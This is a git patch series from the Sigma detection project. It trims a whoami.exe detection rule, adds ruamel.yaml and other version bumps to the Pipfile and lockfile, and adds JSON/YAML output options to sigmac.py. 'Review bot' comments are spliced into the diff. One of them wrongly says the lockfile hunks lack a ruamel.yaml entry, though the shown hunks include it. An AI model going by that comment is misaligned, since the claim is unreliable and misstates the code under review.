diff --git a/rules/windows/process_creation/win_susp_whoami.yml b/rules/windows/process_creation/win_susp_whoami.yml index 5fab95fa..ffc7efca 100644 --- a/rules/windows/process_creation/win_susp_whoami.yml +++ b/rules/windows/process_creation/win_susp_whoami.yml @@ -17,9 +17,7 @@ logsource: detection: selection: Image|endswith: '\whoami.exe' - selection2: - OriginalFileName: 'whoami.exe' - condition: selection or selection2 + condition: selection falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment From c165783fffd8814f18616c76ec48878726d19188 Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Thu, 12 Aug 2021 15:26:46 +0200 Subject: [PATCH 0313/1367] Add an option to enhance default output by choosing fields Add an option to output in JSON or YAML --- Pipfile | 1 + Pipfile.lock | 265 +++++++++++++++++++++++++++--------------- tools/sigma/sigmac.py | 61 ++++++++-- 3 files changed, 225 insertions(+), 102 deletions(-) diff --git a/Pipfile b/Pipfile index 060d74e8..718c305f 100644 --- a/Pipfile +++ b/Pipfile @@ -20,6 +20,7 @@ urllib3 = "~=1.26" progressbar2 = "~=3.47" pymisp = "~=2.4.123" PyYAML = "~=5.1" +"ruamel.yaml" = "*" [requires] python_version = "3.8" diff --git a/Pipfile.lock b/Pipfile.lock index f83fca95..2416e325 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,7 +1,7 @@ { "_meta": { "hash": { - "sha256": "9d6e50bfd41bb3de5ebbae350555fe4b67c24e2c186aac053905a7740a69e8b2" + "sha256": "08bbbed72c177a3a7a43aff79af8fdde3a0ac42e15d7e112d64cac2c5d5b6e68" }, "pipfile-spec": 6, "requires": { @@ -21,6 +21,7 @@ "sha256:149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1", "sha256:ef6aaac3ca6cd92904cdd0d83f629a15f18053ec84e6432106f7a4d04ae4f5fb" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==21.2.0" }, "certifi": { 
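Review bot: `"ruamel.yaml" = "*"` is the only unpinned entry in a dependency block where every neighbour carries a `~=` compatible-release bound, so the next `pipenv lock` or `pipenv update` will accept whatever ruamel.yaml publishes, including a breaking API change or a compromised release, with nothing in the Pipfile to stop it. Pin it like its neighbours to the series the lockfile in this same commit was generated against, `"ruamel.yaml" = "~=0.17"`. The Pipfile.lock entry with its hashes is fine as recorded; the Pipfile bound is what protects re-locking.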
@@ -30,26 +31,29 @@ ], "version": "==2021.5.30" }, - "chardet": { + "charset-normalizer": { "hashes": [ - "sha256:0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa", - "sha256:f864054d66fd9118f2e67044ac8981a54775ec5b67aed0441892edb553d21da5" + "sha256:0c8911edd15d19223366a194a513099a302055a962bca2cec0f54b8b63175d8b", + "sha256:f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3" ], - "version": "==4.0.0" + "markers": "python_version >= '3'", + "version": "==2.0.4" }, "deprecated": { "hashes": [ "sha256:08452d69b6b5bc66e8330adde0a4f8642e969b9e1702904d137eeb29c8ffc771", "sha256:6d2de2de7931a968874481ef30208fd4e08da39177d61d3d4ebdf4366e7dbca1" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.2.12" }, "idna": { "hashes": [ - "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", - "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" + "sha256:14475042e284991034cb48e06f6851428fb14c4dc953acd9be9a5e95c7b6dd7a", + "sha256:467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3" ], - "version": "==2.10" + "markers": "python_version >= '3'", + "version": "==3.2" }, "jsonschema": { "hashes": [ 
@@ -68,24 +72,46 @@ }, "pymisp": { "hashes": [ - "sha256:7ab159ba589f54d105c59cb990722369c57d8f587b5df215a79ed4059cb57b8a", - "sha256:c6496a6884fe3a671e9dd3c314564b4e94b8827845f5ea0004ab3649373e9db2" + "sha256:5971eba9a4d3b7f5ee47035417c7692fc0ec45d581afcaa63e3f7e2d6a400923", + "sha256:641e3db1af1010cff3a652df6eb51ac4f4e540b1801b811d5e009c59114bf26a" ], "index": "pypi", - "version": "==2.4.141.1" + "version": "==2.4.148" }, "pyrsistent": { "hashes": [ - "sha256:2e636185d9eb976a18a8a8e96efce62f2905fea90041958d8cc2a189756ebf3e" + "sha256:097b96f129dd36a8c9e33594e7ebb151b1515eb52cceb08474c10a5479e799f2", + "sha256:2aaf19dc8ce517a8653746d98e962ef480ff34b6bc563fc067be6401ffb457c7", + "sha256:404e1f1d254d314d55adb8d87f4f465c8693d6f902f67eb6ef5b4526dc58e6ea", + "sha256:48578680353f41dca1ca3dc48629fb77dfc745128b56fc01096b2530c13fd426", + "sha256:4916c10896721e472ee12c95cdc2891ce5890898d2f9907b1b4ae0f53588b710", + "sha256:527be2bfa8dc80f6f8ddd65242ba476a6c4fb4e3aedbf281dfbac1b1ed4165b1", + "sha256:58a70d93fb79dc585b21f9d72487b929a6fe58da0754fa4cb9f279bb92369396", + "sha256:5e4395bbf841693eaebaa5bb5c8f5cdbb1d139e07c975c682ec4e4f8126e03d2", + "sha256:6b5eed00e597b5b5773b4ca30bd48a5774ef1e96f2a45d105db5b4ebb4bca680", + "sha256:73ff61b1411e3fb0ba144b8f08d6749749775fe89688093e1efef9839d2dcc35", + "sha256:772e94c2c6864f2cd2ffbe58bb3bdefbe2a32afa0acb1a77e472aac831f83427", + "sha256:773c781216f8c2900b42a7b638d5b517bb134ae1acbebe4d1e8f1f41ea60eb4b", + "sha256:a0c772d791c38bbc77be659af29bb14c38ced151433592e326361610250c605b", + "sha256:b29b869cf58412ca5738d23691e96d8aff535e17390128a1a52717c9a109da4f", + "sha256:c1a9ff320fa699337e05edcaae79ef8c2880b52720bc031b219e5b5008ebbdef", + "sha256:cd3caef37a415fd0dae6148a1b6957a8c5f275a62cca02e18474608cb263640c", + "sha256:d5ec194c9c573aafaceebf05fc400656722793dac57f254cd4741f3c27ae57b4", + "sha256:da6e5e818d18459fa46fac0a4a4e543507fe1110e808101277c5a2b5bab0cd2d", + "sha256:e79d94ca58fcafef6395f6352383fa1a76922268fa02caa2272fff501c2fdc78", + 
"sha256:f3ef98d7b76da5eb19c37fda834d50262ff9167c65658d1d8f974d2e4d90676b", + "sha256:f4c8cabb46ff8e5d61f56a037974228e978f26bfefce4f61a4b1ac0ba7a2ab72" ], - "version": "==0.17.3" + "markers": "python_version >= '3.6'", + "version": "==0.18.0" }, "python-dateutil": { "hashes": [ - "sha256:73ebfe9dbf22e832286dafa60473e4cd239f8592f699aa5adaf10050e6e1823c", - "sha256:75bb3f31ea686f1197762692a9ee6a7550b59fc6ca3a1f4b5d7e32fb98e2da2a" + "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86", + "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9" ], - "version": "==2.8.1" + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==2.8.2" }, "python-utils": { "hashes": [ 
@@ -131,26 +157,62 @@ }, "requests": { "hashes": [ - "sha256:27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804", - "sha256:c210084e36a42ae6b9219e00e48287def368a26d03a048ddad7bfee44f75871e" + "sha256:6c1246513ecd5ecd4528a0906f910e8f0f9c6b8ec72030dc9fd154dc1a6efd24", + "sha256:b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7" ], "index": "pypi", - "version": "==2.25.1" + "version": "==2.26.0" + }, + "ruamel.yaml": { + "hashes": [ + "sha256:106bc8d6dc6a0ff7c9196a47570432036f41d556b779c6b4e618085f57e39e67", + "sha256:ffb9b703853e9e8b7861606dfdab1026cf02505bade0653d1880f4b2db47f815" + ], + "index": "pypi", + "version": "==0.17.10" + }, + "ruamel.yaml.clib": { + "hashes": [ + "sha256:0847201b767447fc33b9c235780d3aa90357d20dd6108b92be544427bea197dd", + "sha256:1866cf2c284a03b9524a5cc00daca56d80057c5ce3cdc86a52020f4c720856f0", + "sha256:31ea73e564a7b5fbbe8188ab8b334393e06d997914a4e184975348f204790277", + "sha256:3fb9575a5acd13031c57a62cc7823e5d2ff8bc3835ba4d94b921b4e6ee664104", + "sha256:4ff604ce439abb20794f05613c374759ce10e3595d1867764dd1ae675b85acbd", + "sha256:72a2b8b2ff0a627496aad76f37a652bcef400fd861721744201ef1b45199ab78", + "sha256:78988ed190206672da0f5d50c61afef8f67daa718d614377dcd5e3ed85ab4a99", + "sha256:7b2927e92feb51d830f531de4ccb11b320255ee95e791022555971c466af4527", + "sha256:7f7ecb53ae6848f959db6ae93bdff1740e651809780822270eab111500842a84", + "sha256:825d5fccef6da42f3c8eccd4281af399f21c02b32d98e113dbc631ea6a6ecbc7", + "sha256:846fc8336443106fe23f9b6d6b8c14a53d38cef9a375149d61f99d78782ea468", + "sha256:89221ec6d6026f8ae859c09b9718799fea22c0e8da8b766b0b2c9a9ba2db326b", + "sha256:9efef4aab5353387b07f6b22ace0867032b900d8e91674b5d8ea9150db5cae94", + "sha256:a32f8d81ea0c6173ab1b3da956869114cae53ba1e9f72374032e33ba3118c233", + "sha256:a49e0161897901d1ac9c4a79984b8410f450565bbad64dbfcbf76152743a0cdb", + "sha256:ada3f400d9923a190ea8b59c8f60680c4ef8a4b0dfae134d2f2ff68429adfab5", + 
"sha256:bf75d28fa071645c529b5474a550a44686821decebdd00e21127ef1fd566eabe", + "sha256:cfdb9389d888c5b74af297e51ce357b800dd844898af9d4a547ffc143fa56751", + "sha256:d67f273097c368265a7b81e152e07fb90ed395df6e552b9fa858c6d2c9f42502", + "sha256:dc6a613d6c74eef5a14a214d433d06291526145431c3b964f5e16529b1842bed", + "sha256:de9c6b8a1ba52919ae919f3ae96abb72b994dd0350226e28f3686cb4f142165c" + ], + "markers": "python_version < '3.10' and platform_python_implementation == 'CPython'", + "version": "==0.2.6" }, "six": { "hashes": [ "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926", "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.16.0" }, "urllib3": { "hashes": [ - "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c", - "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" + "sha256:39fb8672126159acb139a7718dd10806104dec1e2f0f6c88aab05d17df10c8d4", + "sha256:f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f" ], "index": "pypi", - "version": "==1.26.5" + "version": "==1.26.6" }, "wrapt": { "hashes": [ @@ -200,6 +262,7 @@ "sha256:f881853d2643a29e643609da57b96d5f9c9b93f62429dcc1cbb413c7d07f0e1a", "sha256:fe60131d21b31fd1a14bd43e6bb88256f69dfc3188b3a89d736d6c71ed43ec95" ], + "markers": "python_version >= '3.6'", "version": "==3.7.4.post0" }, "antlr4-python3-runtime": { 
@@ -214,21 +277,23 @@ "sha256:0c3c816a028d47f659d6ff5c745cb2acf1f966da1fe5c19c77a70282b25f4c5f", "sha256:4291ca197d287d274d0b6cb5d6f8f8f82d434ed288f962539ff18cc9012f9ea3" ], + "markers": "python_full_version >= '3.5.3'", "version": "==3.0.1" }, "attackcti": { "hashes": [ - "sha256:60059c597f39074db979482931c8771c31581c76e0ae6451c04214a1330a5d2f", - "sha256:a0c44c7065d2568b728e62a8325b0c5fde9d6901e4e0199bde7a9bab974bdcb9" + "sha256:2516b00631d4f0f8e05e950281ed94566774587b968901c02296e174835f0786", + "sha256:98d9c80a2c566847aa6d95fe824f48e8c45a418bbbb212e96dcf468693754cea" ], "index": "pypi", - "version": "==0.3.4.3" + "version": "==0.3.4.4" }, "attrs": { "hashes": [ "sha256:149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1", "sha256:ef6aaac3ca6cd92904cdd0d83f629a15f18053ec84e6432106f7a4d04ae4f5fb" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==21.2.0" }, "certifi": { @@ -243,8 +308,17 @@ "sha256:0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa", "sha256:f864054d66fd9118f2e67044ac8981a54775ec5b67aed0441892edb553d21da5" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==4.0.0" }, + "charset-normalizer": { + "hashes": [ + "sha256:0c8911edd15d19223366a194a513099a302055a962bca2cec0f54b8b63175d8b", + "sha256:f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3" + ], + "markers": "python_version >= '3'", + "version": "==2.0.4" + }, "colorama": { "hashes": [ "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b", 
@@ -313,11 +387,11 @@ }, "elasticsearch": { "hashes": [ - "sha256:9a77172be02bc4855210d83f0f1346a1e7d421e3cb2ca47ba81ac0c5a717b3a0", - "sha256:c67b0f6541eda6de9f92eaea319c070aa2710c5d4d4ee5e3dfa3c21bd95aa378" + "sha256:084979d21cc2955903ecc215bb40b8180207b2bcb5e52ec0ec7dd6f60affd01e", + "sha256:f3ab1454e646170bbc6796b8707e4bff125234391d2acc022221e1c0313becb4" ], "index": "pypi", - "version": "==7.12.0" + "version": "==7.14.0" }, "elasticsearch-async": { "hashes": [ @@ -329,16 +403,18 @@ }, "idna": { "hashes": [ - "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", - "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" + "sha256:14475042e284991034cb48e06f6851428fb14c4dc953acd9be9a5e95c7b6dd7a", + "sha256:467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3" ], - "version": "==2.10" + "markers": "python_version >= '3'", + "version": "==3.2" }, "more-itertools": { "hashes": [ "sha256:2cf89ec599962f2ddc4d568a05defc40e0a587fbc10d5989713638864c36be4d", "sha256:83f0308e05477c68f56ea3a888172c78ed5d5b3c282addb67508e7ba6c8f813a" ], + "markers": "python_version >= '3.5'", "version": "==8.8.0" }, "multidict": { 
@@ -381,27 +457,30 @@ "sha256:f21756997ad8ef815d8ef3d34edd98804ab5ea337feedcd62fb52d22bf531281", "sha256:fc13a9524bc18b6fb6e0dbec3533ba0496bbed167c56d0aabefd965584557d80" ], + "markers": "python_version >= '3.6'", "version": "==5.1.0" }, "packaging": { "hashes": [ - "sha256:5b327ac1320dc863dca72f4514ecc086f31186744b84a230374cc1fd776feae5", - "sha256:67714da7f7bc052e064859c05c595155bd1ee9f69f76557e21f051443c20947a" + "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7", + "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14" ], - "version": "==20.9" + "markers": "python_version >= '3.6'", + "version": "==21.0" }, "pathspec": { "hashes": [ - "sha256:86379d6b86d75816baba717e64b1a3a3469deb93bb76d613c9ce79edc5cb68fd", - "sha256:aa0cb481c4041bf52ffa7b0d8fa6cd3e88a2ca4879c533c9153882ee2556790d" + "sha256:7d15c4ddb0b5c802d161efc417ec1a2558ea2653c2e8ad9c19098201dc1c993a", + "sha256:e564499435a2673d586f6b2130bb5b95f04a3ba06f81b8f895b651a3c76aabb1" ], - "version": "==0.8.1" + "version": "==0.9.0" }, "pluggy": { "hashes": [ "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0", "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==0.13.1" }, "py": { @@ -409,6 +488,7 @@ "sha256:21b81bda15b66ef5e1a777a21c4dcd9c20ad3efd0b3f817e7a809035269e1bd3", "sha256:3b80836aa6d1feeaa108e046da6423ab8f6ceda6468545ae8d02d9d58d18818a" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.10.0" }, "pyparsing": { @@ -416,6 +496,7 @@ "sha256:c203ec8783bf771a155b207279b9bccb8dea02d8f0c9e5f8ead507bc3246ecc1", "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b" ], + "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==2.4.7" }, "pytest": { 
@@ -470,76 +551,70 @@
 },
 "requests": {
 "hashes": [
- "sha256:27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804",
- "sha256:c210084e36a42ae6b9219e00e48287def368a26d03a048ddad7bfee44f75871e"
+ "sha256:6c1246513ecd5ecd4528a0906f910e8f0f9c6b8ec72030dc9fd154dc1a6efd24",
+ "sha256:b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7"
 ],
 "index": "pypi",
- "version": "==2.25.1"
+ "version": "==2.26.0"
 },
 "simplejson": {
 "hashes": [
- "sha256:034550078a11664d77bc1a8364c90bb7eef0e44c2dbb1fd0a4d92e3997088667",
- "sha256:05b43d568300c1cd43f95ff4bfcff984bc658aa001be91efb3bb21df9d6288d3",
- "sha256:0dd9d9c738cb008bfc0862c9b8fa6743495c03a0ed543884bf92fb7d30f8d043",
- "sha256:10fc250c3edea4abc15d930d77274ddb8df4803453dde7ad50c2f5565a18a4bb",
- "sha256:2862beabfb9097a745a961426fe7daf66e1714151da8bb9a0c430dde3d59c7c0",
- "sha256:292c2e3f53be314cc59853bd20a35bf1f965f3bc121e007ab6fd526ed412a85d",
- "sha256:2d3eab2c3fe52007d703a26f71cf649a8c771fcdd949a3ae73041ba6797cfcf8",
- "sha256:2e7b57c2c146f8e4dadf84977a83f7ee50da17c8861fd7faf694d55e3274784f",
- "sha256:311f5dc2af07361725033b13cc3d0351de3da8bede3397d45650784c3f21fbcf",
- "sha256:344e2d920a7f27b4023c087ab539877a1e39ce8e3e90b867e0bfa97829824748",
- "sha256:3fabde09af43e0cbdee407555383063f8b45bfb52c361bc5da83fcffdb4fd278",
- "sha256:42b8b8dd0799f78e067e2aaae97e60d58a8f63582939af60abce4c48631a0aa4",
- "sha256:4b3442249d5e3893b90cb9f72c7d6ce4d2ea144d2c0d9f75b9ae1e5460f3121a",
- "sha256:55d65f9cc1b733d85ef95ab11f559cce55c7649a2160da2ac7a078534da676c8",
- "sha256:5c659a0efc80aaaba57fcd878855c8534ecb655a28ac8508885c50648e6e659d",
- "sha256:72d8a3ffca19a901002d6b068cf746be85747571c6a7ba12cbcf427bfb4ed971",
- "sha256:75ecc79f26d99222a084fbdd1ce5aad3ac3a8bd535cd9059528452da38b68841",
- "sha256:76ac9605bf2f6d9b56abf6f9da9047a8782574ad3531c82eae774947ae99cc3f",
- "sha256:7d276f69bfc8c7ba6c717ba8deaf28f9d3c8450ff0aa8713f5a3280e232be16b",
- "sha256:7f10f8ba9c1b1430addc7dd385fc322e221559d3ae49b812aebf57470ce8de45",
- "sha256:8042040af86a494a23c189b5aa0ea9433769cc029707833f261a79c98e3375f9",
- "sha256:813846738277729d7db71b82176204abc7fdae2f566e2d9fcf874f9b6472e3e6",
- "sha256:845a14f6deb124a3bcb98a62def067a67462a000e0508f256f9c18eff5847efc",
- "sha256:869a183c8e44bc03be1b2bbcc9ec4338e37fa8557fc506bf6115887c1d3bb956",
- "sha256:8acf76443cfb5c949b6e781c154278c059b09ac717d2757a830c869ba000cf8d",
- "sha256:8f713ea65958ef40049b6c45c40c206ab363db9591ff5a49d89b448933fa5746",
- "sha256:934115642c8ba9659b402c8bdbdedb48651fb94b576e3b3efd1ccb079609b04a",
- "sha256:9551f23e09300a9a528f7af20e35c9f79686d46d646152a0c8fc41d2d074d9b0",
- "sha256:9a2b7543559f8a1c9ed72724b549d8cc3515da7daf3e79813a15bdc4a769de25",
- "sha256:a55c76254d7cf8d4494bc508e7abb993a82a192d0db4552421e5139235604625",
- "sha256:ad8f41c2357b73bc9e8606d2fa226233bf4d55d85a8982ecdfd55823a6959995",
- "sha256:af4868da7dd53296cd7630687161d53a7ebe2e63814234631445697bd7c29f46",
- "sha256:afebfc3dd3520d37056f641969ce320b071bc7a0800639c71877b90d053e087f",
- "sha256:b59aa298137ca74a744c1e6e22cfc0bf9dca3a2f41f51bc92eb05695155d905a",
- "sha256:bc00d1210567a4cdd215ac6e17dc00cb9893ee521cee701adfd0fa43f7c73139",
- "sha256:c1cb29b1fced01f97e6d5631c3edc2dadb424d1f4421dad079cb13fc97acb42f",
- "sha256:c94dc64b1a389a416fc4218cd4799aa3756f25940cae33530a4f7f2f54f166da",
- "sha256:ceaa28a5bce8a46a130cd223e895080e258a88d51bf6e8de2fc54a6ef7e38c34",
- "sha256:cff6453e25204d3369c47b97dd34783ca820611bd334779d22192da23784194b",
- "sha256:d0b64409df09edb4c365d95004775c988259efe9be39697d7315c42b7a5e7e94",
- "sha256:d4813b30cb62d3b63ccc60dd12f2121780c7a3068db692daeb90f989877aaf04",
- "sha256:da3c55cdc66cfc3fffb607db49a42448785ea2732f055ac1549b69dcb392663b",
- "sha256:e058c7656c44fb494a11443191e381355388443d543f6fc1a245d5d238544396",
- "sha256:fed0f22bf1313ff79c7fc318f7199d6c2f96d4de3234b2f12a1eab350e597c06",
- "sha256:ffd4e4877a78c84d693e491b223385e0271278f5f4e1476a4962dca6824ecfeb"
+ "sha256:02bc0b7b643fa255048862f580bb4b7121b88b456bc64dabf9bf11df116b05d7",
+ "sha256:02c04b89b0a456a97d5313357dd9f2259c163a82c5307e39e7d35bb38d7fd085",
+ "sha256:05cd392c1c9b284bda91cf9d7b6f3f46631da459e8546fe823622e42cf4794bb",
+ "sha256:1331a54fda3c957b9136402943cf8ebcd29c0c92101ba70fa8c2fc9cdf1b8476",
+ "sha256:18302970ce341c3626433d4ffbdac19c7cca3d6e2d54b12778bcb8095f695473",
+ "sha256:1ebbaa48447b60a68043f58e612021e8893ebcf1662a1b18a2595ca262776d7e",
+ "sha256:2104475a0263ff2a3dffca214c9676eb261e90d06d604ac7063347bd289ac84c",
+ "sha256:23169d78f74fd25f891e89c779a63fcb857e66ab210096f4069a5b1c9e2dc732",
+ "sha256:32edf4e491fe174c54bf6682d794daf398736158d1082dbcae526e4a5af6890b",
+ "sha256:3904b528e3dc0facab73a4406ebf17f007f32f0a8d7f4c6aa9ed5cbad3ea0f34",
+ "sha256:391a8206e698557a4155354cf6996c002aa447a21c5c50fb94a0d26fd6cca586",
+ "sha256:3c80b343503da8b13fa7d48d1a2395be67e97b67a849eb79d88ad3b12783e7da",
+ "sha256:3dddd31857d8230aee88c24f485ebca36d1d875404b2ef11ac15fa3c8a01dc34",
+ "sha256:56f57c231cdd01b6a1c0532ea9088dff2afe7f4f4bda61c060bcb1a853e6b564",
+ "sha256:5b080be7de4c647fa84252cf565298a13842658123bd1a322a8c32b6359c8f1e",
+ "sha256:6285b91cfa37e024f372b9b77d14f279380eebc4f709db70c593c069602e1926",
+ "sha256:6510e886d9e9006213de2090c55f504b12f915178a2056b94840ed1d89abe68e",
+ "sha256:6ff6710b824947ef5a360a5a5ae9809c32cedc6110df3b64f01080c1bc1a1f08",
+ "sha256:79545a6d93bb38f86a00fbc6129cb091a86bb858e7d53b1aaa10d927d3b6732e",
+ "sha256:88a69c7e8059a4fd7aa2a31d2b3d89077eaae72eb741f18a32cb57d04018ff4c",
+ "sha256:8f174567c53413383b8b7ec2fbe88d41e924577bc854051f265d4c210cd72999",
+ "sha256:a52b80b9d1085db6e216980d1d28a8f090b8f2203a8c71b4ea13441bd7a2e86e",
+ "sha256:b25748e71c5df3c67b5bda2cdece373762d319cb5f773f14ae2f90dfb4320314",
+ "sha256:b45b5f6c9962953250534217b18002261c5b9383349b95fb0140899cdac2bf95",
+ "sha256:b4ed7b233e812ef1244a29fb0dfd3e149dbc34a2bd13b174a84c92d0cb580277",
+ "sha256:b60f48f780130f27f8d9751599925c3b78cf045f5d62dd918003effb65b45bda",
+ "sha256:c69a213ae72b75e8948f06a87d3675855bccb3037671222ffd235095e62f5a61",
+ "sha256:c91d0f2fc2ee1bd376f5a991c24923f12416d8c31a9b74a82c4b38b942fc2640",
+ "sha256:d61fb151be068127a0ce7758341cbe778495819622bc1e15eadf59fdb3a0481e",
+ "sha256:da72a452bcf4349fc467a12b54ab0e63e654a571cacc44084826d52bde12b6ee",
+ "sha256:dbcd6cd1a9abb5a13c5df93cdc5687f6877efcfefdc9350c22d4094dc4a7dd86",
+ "sha256:e056056718246c9cdd82d1e3d4ad854a7ceb057498bf994b529750a190a6bd98",
+ "sha256:e3aa10cce4053f3c1487aaf847a0faa4ae208e11f85a8e6f98de2291713a6616",
+ "sha256:e7433c604077a17dd71e8b29c96a15e486a70a97f4ed9c7f5e0df6e428af2f0b",
+ "sha256:f02db159e0afa9cb350f15f4f7b86755eae95267b9012ee90bde329aa643f76c",
+ "sha256:f32a703fe10cfc2d1020e296eeeeb650faa039678f6b79d9b820413a4c015ddc",
+ "sha256:fed5e862d9b501c5673c163c8593ebdb2c5422386089c529dfac28d70cd55858",
+ "sha256:ff7fe042169dd6fce8213c173a4c337f2e807ed5178093143c778eb0484c12ec"
 ],
- "version": "==3.17.2"
+ "markers": "python_version >= '2.5' and python_version not in '3.0, 3.1, 3.2, 3.3'",
+ "version": "==3.17.3"
 },
 "six": {
 "hashes": [
 "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926",
 "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"
 ],
+ "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'",
 "version": "==1.16.0"
 },
 "stix2": {
 "hashes": [
- "sha256:15c9cf599f5c43124e76fe71b883e4918f6f4cf65b084c58ec64b6180f45c938",
- "sha256:3ab60082e4bffb39f75ea9ddc338b64126ff1cd086e6173d39b860191ac26ff4"
+ "sha256:b9b2200e5c429a0a49d67c8902638d2f97df2ba4321e15dde067c5cb80c9e8e1"
 ],
 "index": "pypi",
- "version": "==2.1.0"
+ "version": "==3.0.0"
 },
 "stix2-patterns": {
 "hashes": [
@@ -565,11 +640,11 @@
 },
 "urllib3": {
 "hashes": [
- "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c",
- "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098"
+ "sha256:39fb8672126159acb139a7718dd10806104dec1e2f0f6c88aab05d17df10c8d4",
+ "sha256:f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f"
 ],
 "index": "pypi",
- "version": "==1.26.5"
+ "version": "==1.26.6"
 },
 "wcwidth": {
 "hashes": [
@@ -580,11 +655,10 @@
 },
 "yamllint": {
 "hashes": [
- "sha256:8a5f8e442f49309eaf3e9d7232ce76f2fc8026f5c0c0b164b83f33fed1399637",
- "sha256:b0e4c89985c7f5f8451c2eb8c67d804d10ac13a4abe031cbf49bdf3465d01087"
+ "sha256:0b08a96750248fdf21f1e8193cb7787554ef75ed57b27f621cd6b3bf09af11a1"
 ],
 "index": "pypi",
- "version": "==1.26.0"
+ "version": "==1.26.2"
 },
 "yarl": {
 "hashes": [
@@ -626,6 +700,7 @@
 "sha256:f0b059678fd549c66b89bed03efcabb009075bd131c248ecdf087bdb6faba24a",
 "sha256:fcbb48a93e8699eae920f8d92f7160c03567b421bc17362a9ffbbd706a816f71"
 ],
+ "markers": "python_version >= '3.6'",
 "version": "==1.6.3"
 }
 }
diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py
index 0da400c2..2e8863c1 100755
--- a/tools/sigma/sigmac.py
+++ b/tools/sigma/sigmac.py
@@ -18,6 +18,7 @@ import sys
 import argparse
 import yaml
+import ruamel.yaml
 import json
 import pathlib
 import itertools
@@ -53,10 +54,14 @@ ERR_RULE_FILTER_PARSING = 11
 ERR_CONFIG_REQUIRED = 20
 ERR_CONFIG_ORDER = 21
 ERR_CONFIG_BACKEND = 22
+ERR_OUTPUT_FORMAT = 30
 ERR_NOT_IMPLEMENTED = 42
 ERR_PARTIAL_FIELD_MATCH = 80
 ERR_FULL_FIELD_MATCH = 90
+# Allowed fields in output
+allowed_fields = ["title", "id", "status", "description", "author", "references", "fields", "falsepositives", "level", "tags", "filename"]
+
 def alliter(path):
 for sub in path.iterdir():
 if sub.name.startswith("."):
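Review bot: `import ruamel.yaml` brings in a second YAML library next to the existing `import yaml`, and this patch uses it for a single dump call in its last hunk; PyYAML, already imported, can serialise the same plain dicts and lists with `yaml.safe_dump(output_array, allow_unicode=True)` and no new runtime dependency. If ruamel.yaml is kept it has to be declared wherever the project pins its dependencies; the Pipfile.lock hunks above do not show such an entry, though only part of that file is on the page, so this is worth checking rather than assuming.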
